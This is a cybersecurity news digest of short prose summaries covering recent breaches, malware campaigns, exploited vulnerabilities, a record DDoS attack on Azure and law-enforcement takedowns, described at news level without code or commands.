Daily Brief

Microsoft issued an out-of-band update, KB5072653, to address installation errors with Windows 10's November extended security updates, impacting both consumer and enterprise users. Windows 10 reached end-of-support in October 2025, necessitating extended security updates (ESU) for continued protection, available for a fee or through Microsoft rewards. The update resolves 0x800f0922 errors that prevented the successful installation of November's security patches, ensuring continued security compliance for users. Affected devices require Windows 10 version 22H2 and the October 2025 cumulative update to install the new fix, which is automatically deployed via Windows Update. Some enterprise environments using WSUS and SCCM faced challenges with update compliance checks; Microsoft plans to release a new Scan Cab to address these issues. The ongoing need for emergency updates highlights the importance of robust patch management strategies to maintain security postures as software reaches end-of-life. Organizations are encouraged to participate in webinars and discussions to enhance their patch management processes and align with best practices.

Seven NPM packages, published under "dino_reborn," use Adspect to redirect victims to cryptocurrency scam sites, targeting users between September and November. Six packages contain malicious code that collects visitor data to differentiate between potential victims and researchers, enhancing the attack's precision. The cloaking mechanism in these packages employs a 39kB script that automatically executes on page load, evading detection by security researchers. Anti-analysis techniques block common inspection actions, complicating efforts to scrutinize the malicious JavaScript and its operations. Targeted users are redirected to fake cryptocurrency CAPTCHA pages, while researchers see benign content, minimizing suspicion and detection. Adspect, a cloud service intended to filter unauthorized access, is misused in this attack, raising questions about its security measures. The incident underscores the need for vigilant monitoring of third-party packages and robust defenses against sophisticated redirection tactics.

The RondoDox botnet is exploiting a critical RCE flaw in XWiki Platform, tracked as CVE-2025-24893, actively targeting vulnerable servers. The U.S. Cybersecurity and Information Security Agency (CISA) has identified this flaw as actively exploited, prompting urgent attention from security teams. VulnCheck reports multiple threat actors, including botnet operators and cryptocurrency miners, leveraging this vulnerability for malicious activities. RondoDox spreads via a crafted HTTP GET request, injecting base64-encoded Groovy code to download and execute a remote shell payload. The botnet's rapid growth and adaptation to 56 known vulnerabilities highlight its evolving threat, with recent attacks also deploying cryptocurrency miners. XWiki Platform users are advised to upgrade to versions 15.10.11 or 16.4.1 to mitigate this vulnerability and prevent further exploitation. Publicly available indicators of compromise (IoCs) can help organizations block RondoDox-related exploitation attempts effectively.

Microsoft Azure faced the largest cloud-based DDoS attack recorded, with traffic reaching 15.72 terabits per second, originating from the Aisuru botnet. The attack targeted a single endpoint in Australia, utilizing over 500,000 source IPs to flood the system with 3.64 billion packets per second. Azure's cloud DDoS protection service successfully detected and mitigated the attack, ensuring no customer service interruptions occurred. Aisuru, a Mirai-based IoT botnet, has been escalating its capabilities, previously executing a 6.3 Tbps attack on KrebsOnSecurity in June 2025. The botnet primarily compromises home routers and cameras, operating as a DDoS-for-hire service while reportedly avoiding national security targets. Cloudflare removed Aisuru-linked domains from its rankings due to excessive requests, aiming to prevent manipulation and protect DNS services. The incident underscores the increasing scale of DDoS attacks, with a 40% rise in such activities reported by Cloudflare in Q2 2025 compared to the previous year.

The Government Accountability Office (GAO) identified significant lapses in the Department of Defense's (DoD) training and guidance on preventing sensitive information leaks through social media channels. Auditors acting as threat actors discovered exploitable data from military personnel and their families online, posing risks to operational security and personal safety. Public social media posts and official press releases were found to inadvertently disclose sensitive details, potentially endangering military operations and personnel. The GAO's investigation revealed that 10 DoD components lacked comprehensive training and threat assessment protocols, particularly in areas beyond traditional operational security. The GAO issued 12 recommendations to the DoD, which agreed to implement all but one, citing limitations in controlling personal digital activities of personnel and their families. The report underscores the need for improved digital awareness and training to mitigate risks posed by the digital footprints of service members and their families. The DoD's partial acceptance of recommendations highlights ongoing challenges in balancing operational security with personal freedoms in the digital age.

Eurofiber France reported a data breach affecting its ticket management system, where hackers exploited a vulnerability to access and exfiltrate sensitive information. The breach impacts the French division of Eurofiber Group, including its cloud division and regional sub-brands, but does not affect critical data or the broader Eurofiber network. The company quickly enhanced security measures, patched the vulnerability, and implemented additional protections to prevent further data leaks. A threat actor, 'ByteToBreach', claims to have stolen data from 10,000 businesses and government entities, including VPN configurations and SQL backup files. Eurofiber France has notified relevant authorities, including CNIL and ANSSI, and filed a report for extortion as the threat actor demands payment to avoid data exposure. The incident follows previous breaches in the French telecommunications sector, indicating a persistent threat landscape for service providers. Eurofiber France is in the process of notifying affected customers, though specific details on the types of data stolen remain undisclosed.

Security researcher Jonathan Clark claims Coinbase was aware of a December 2024 breach months before its official disclosure in May 2025. Clark reported the breach to Coinbase on January 7, 2025, after scammers attempted to defraud him using detailed personal information. The breach involved unauthorized access to nearly 70,000 customers' private and financial data, including Social Security numbers and transaction history. Despite an initial acknowledgment from Coinbase's Head of Trust and Safety, Clark received no further communication after multiple follow-ups. Coinbase disclosed the breach to the SEC in May, stating the attack occurred on December 26, 2024, and was discovered on May 11, 2025. The attackers also attempted to extort Coinbase for $20 million, raising concerns about the company's incident response and communication practices. This incident underscores the critical importance of timely breach disclosures and robust communication with affected parties to maintain trust.

Princeton University experienced a data breach on November 10, impacting alumni, donors, faculty, and students' personal information stored in a fundraising database. Threat actors accessed the database through a phishing attack targeting a university employee, compromising names, emails, and addresses. The compromised database did not include sensitive financial information, Social Security numbers, or detailed student records protected by privacy laws. University officials have blocked the attackers' access and confirmed no further systems were compromised. Affected individuals are advised to verify any communication from the university before sharing sensitive information to avoid potential phishing scams. The incident follows a similar breach at the University of Pennsylvania, though Princeton reports no evidence linking the two events. The breach underscores the importance of robust phishing defenses and employee awareness training to protect sensitive institutional data.

Dutch authorities seized 250 servers from a bulletproof hosting service, used by cybercriminals for anonymity since 2022, impacting over 80 cybercrime investigations globally. The hosting service facilitated ransomware, botnet, phishing activities, and child abuse content distribution, exploiting its no-KYC and no-logs policies. The operation, part of "Operation Endgame," also targeted malware like Rhadamanthys, VenomRAT, and Elysium, with no arrests announced yet. Thousands of virtual servers were taken offline, disrupting services for clients who relied on the provider for anonymous operations. Investigators are conducting forensic analyses on the seized servers to identify operators and clientele involved in illicit activities. The service, speculated to be CrazyRDP, is now offline, causing concerns among users about potential exit scams and unresolved technical issues. This action underscores the ongoing efforts to dismantle infrastructure supporting cybercriminal activities and enhance global cybersecurity.

Four U.S. citizens and a Ukrainian broker admitted to aiding North Korean IT workers in securing fraudulent employment with American companies. The scheme involved selling identities, leading to unauthorized access to jobs and salaries at over 64 U.S. companies. Participants facilitated remote work setups, allowing North Korean operatives to appear as U.S.-based employees, resulting in $1.28 million in salary fraud. A former U.S. Army soldier was among those involved, earning over $51,000, while others earned significantly less. The Department of Justice emphasized the national security implications, as the fraud supports North Korea's financial and intelligence objectives. The FBI urges companies to enhance vetting processes for remote workers to prevent similar fraudulent activities. Okta and CrowdStrike have identified a growing trend of North Korean-linked scams targeting U.S. businesses for financial gain and intellectual property theft.

Microsoft Azure faced a significant DDoS attack, reaching 15.72 terabits per second, originating from the Aisuru botnet, utilizing over 500,000 IP addresses. The attack targeted a specific public IP in Australia, employing high-rate UDP floods, and achieved nearly 3.64 billion packets per second. Aisuru is a Turbo Mirai-class IoT botnet, exploiting vulnerabilities in home routers and cameras, primarily affecting residential ISPs globally. Cloudflare linked Aisuru to a previous record-breaking 22.2 Tbps attack, demonstrating the botnet's capability to execute large-scale disruptions. The botnet expanded significantly in April 2025 after breaching a TotoLink router firmware server, infecting around 100,000 additional devices. Cloudflare has taken steps to mitigate the botnet's impact by removing related domains from its rankings to prevent manipulation and maintain trust. The incident underscores the growing threat of IoT-based botnets and the need for robust defenses against increasingly sophisticated DDoS attacks.

eSentire has identified the EVALUSION campaign, leveraging ClickFix tactics to distribute Amatera Stealer and NetSupport RAT, posing significant risks to data security. Amatera Stealer, an evolution of the ACR Stealer, is available via subscription and targets crypto-wallets, browsers, and messaging applications, among others. The malware employs advanced evasion techniques, including WoW64 SysCalls, to bypass common security measures like sandboxes and anti-virus solutions. Attackers trick users into executing malicious commands through phishing pages, initiating a process that downloads and executes the malware via PowerShell scripts. The payload, Amatera Stealer DLL, is packed using PureCrypter and injected into the MSBuild.exe process to harvest sensitive data. NetSupport RAT is only downloaded if the victim's machine is part of a domain or contains files of potential value, such as crypto wallets. The campaign is part of a broader trend of phishing attacks using sophisticated obfuscation techniques to evade detection by security tools.

A vulnerability in DoorDash's systems allowed unauthorized sending of branded emails, creating a potential phishing channel until recently patched by the company. The flaw was discovered by a security researcher, who reported it could be exploited for social engineering scams using DoorDash's official email templates. The vulnerability involved manipulating the DoorDash for Business platform to send emails with crafted HTML, bypassing spam filters and appearing legitimate. A dispute arose between the researcher and DoorDash over the handling of the disclosure, with accusations of unethical behavior from both parties. Despite the flaw being patched, the researcher claims it remained exploitable for over 15 months, criticizing DoorDash's delayed response. DoorDash asserts the issue was out of scope for their bug bounty program and accuses the researcher of attempting extortion. The incident highlights the challenges in vulnerability disclosure processes and the need for clear communication and ethical standards between researchers and companies.

The Pennsylvania Attorney General's Office confirmed a data breach following an August 2025 ransomware attack by the INC Ransom group, affecting personal and medical information. The attack led to significant operational disruptions, taking down the office's website, email accounts, and phone lines, causing widespread impact. Personal data compromised includes names, Social Security numbers, and medical information, as per the Office's investigation. The breach exploited vulnerabilities in Citrix NetScaler appliances, specifically CVE-2025-5777, known as Citrix Bleed 2, affecting public-facing systems. INC Ransom claimed responsibility on their dark web site, alleging theft of 5.7TB of data and potential access to an FBI network. The Pennsylvania OAG chose not to pay the ransom, following a precedent set by previous breaches within the state. This incident marks the third ransomware attack on Pennsylvania state entities, highlighting ongoing cybersecurity challenges.

Europol's Internet Referral Unit conducted a large-scale operation on November 13, targeting extremist content across gaming and related platforms. The operation identified thousands of URLs, including 5,408 links to jihadist content and 1,070 promoting violent right-wing extremism. This initiative marks Europol's first significant action focusing on gaming platforms, which are increasingly exploited for radicalization and extremist recruitment. Extremists use gaming spaces for strategic dissemination of propaganda, employing tactics like re-enacting violent scenes in games to attract young audiences. Europol's action forms part of a coordinated "Referral Action Day," involving multiple countries to combat the misuse of digital platforms. The IRU's efforts align with the EU's Radicalisation Awareness Network, which warns of the strategic use of gaming spaces by extremist groups. Gaming platform operators may face increased pressure to collaborate with law enforcement and swiftly address extremist content. This development serves as a caution to parents and young gamers about the evolving risks within gaming environments.